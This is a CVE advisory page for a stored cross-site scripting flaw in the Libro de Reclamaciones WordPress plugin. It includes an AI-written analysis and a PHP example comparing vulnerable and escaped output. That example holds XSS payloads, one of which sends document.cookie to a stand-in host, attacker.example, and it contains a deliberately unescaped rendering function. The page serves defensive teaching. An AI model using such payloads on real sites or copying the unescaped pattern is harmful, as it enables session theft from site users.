CVE-2025-46446
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ivanrojas Libro de Reclamaciones libro-de-reclamaciones allows Stored XSS. This issue affects Libro de Reclamaciones: from n/a through <= 1.0.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS vulnerability in the Libro de Reclamaciones WordPress plugin allows attackers with low privileges to inject malicious scripts executed when visitors view affected pages.
Vulnerability Analysis
The Libro de Reclamaciones WordPress plugin (versions up to and including 1.0.1) contains a Stored Cross-Site Scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. This means the plugin fails to sanitize or escape certain input fields before storing them in the database, and later renders that data without proper encoding when displaying it to users.
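The vulnerable-then-fixed pattern behind this class of bug, shown here as an added example that is not code from the Libro de Reclamaciones plugin or from Patchstack. The field names (nombre, detalle), the rendering functions and the complaint payload are all hypothetical; the small stand-ins for WordPress functions exist only so the file runs under plain PHP outside WordPress, and a real plugin must use the core versions instead.

```php
<?php
// Added example, not code from the Libro de Reclamaciones plugin.
// Field names, function names and the sample submission are hypothetical.

// Stand-ins so the file runs under `php example.php` outside WordPress.
// Inside WordPress these functions already exist and must not be redefined;
// the guards keep this file harmless if it is ever loaded there.
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    // Rough approximation of WordPress core: strip tags, drop control
    // characters, trim. The real function does more (UTF-8 checks, etc.).
    function sanitize_text_field(string $s): string {
        $s = strip_tags($s);
        $s = preg_replace('/[\x00-\x1F\x7F]/', '', $s);
        return trim($s);
    }
}

// Constructed complaint submission from a low-privileged user. One field
// targets an HTML text context, the other breaks out of an attribute value.
$submission = [
    'nombre'  => '<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    'detalle' => '" onmouseover="alert(document.domain)',
];

// VULNERABLE: values are stored verbatim and echoed back unescaped, both as
// element text and inside an attribute. Either one executes in the browser
// of whoever later opens the complaints list, e.g. an administrator.
function render_vulnerable(array $row): string {
    return '<tr><td>' . $row['nombre'] . '</td>'
         . '<td><input value="' . $row['detalle'] . '"></td></tr>';
}

// FIXED: sanitise on input as defence in depth, and escape on output with
// the function that matches the HTML context: esc_html() for element text,
// esc_attr() for attribute values. Output escaping is the decisive control.
function store_sanitised(array $fields): array {
    return [
        'nombre'  => sanitize_text_field($fields['nombre']),
        'detalle' => sanitize_text_field($fields['detalle']),
    ];
}
function render_fixed(array $row): string {
    return '<tr><td>' . esc_html($row['nombre']) . '</td>'
         . '<td><input value="' . esc_attr($row['detalle']) . '"></td></tr>';
}

echo "Vulnerable output:\n" . render_vulnerable($submission) . "\n\n";
echo "Fixed output:\n" . render_fixed(store_sanitised($submission)) . "\n";
```

Running the file side by side makes the important point visible: `sanitize_text_field()` removes the `<script>` tags from the first field, but it leaves the second field untouched because `" onmouseover="...` contains no tag at all. Only `esc_attr()` at the output stage turns that quote into `&quot;` and keeps the attribute closed, which is why input sanitisation alone does not fix a stored XSS and why the escaping function has to match the context the value is written into.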
Attack Vector and Prerequisites
Exploitation requires the attacker to hold a low-privileged role (such as subscriber or contributor) that can submit or modify content through the plugin's forms [1]. User interaction is also required [1]: because the payload is stored server-side, it does not run when it is submitted but whenever another user, including an administrator, loads the page on which the plugin renders the stored data.
Impact
Successful exploitation allows an attacker to inject arbitrary HTML and JavaScript into the vulnerable site [1]. This can lead to session hijacking, forced redirects to malicious sites, defacement, or injection of unwanted advertisements and other malicious content that will execute whenever guests visit the compromised page [1].
Mitigation Status
As of the publication date, no official patch has been released for CVE-2025-46446 [1]. The Patchstack team has issued a virtual mitigation rule to block attempted attacks until a permanent fix becomes available and can be safely applied [1]. Once a fixed version is published, updating the plugin is the immediate action; site owners who cannot update should contact their hosting provider or web developer for assistance [1].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
Range: <= 1.0.1
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (1)
News mentions (0)
No linked articles in our index yet.